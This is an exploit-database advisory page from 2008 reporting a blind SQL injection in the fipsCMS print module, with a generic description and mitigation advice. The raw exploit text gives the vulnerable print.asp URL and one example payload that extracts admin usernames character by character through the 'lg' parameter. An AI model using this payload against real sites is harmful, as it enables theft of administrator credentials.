Blind SQL Injection

vendor:

fipsCMS

by:

InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: fipsCMS

Affected Version From: fipsCMS [Print Module]

Affected Version To: fipsCMS [Print Module]

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.

Source

Exploit-DB raw data:

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Blind SQL Injection
 
Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]

Application :: fipsCMS [Print Module]
 
Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73 

Dork 1 ::  Use ur mind !
 
ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL]

Example : //IIF((select%20mid(last(username),1,1)%20
from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko')

 
-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-07]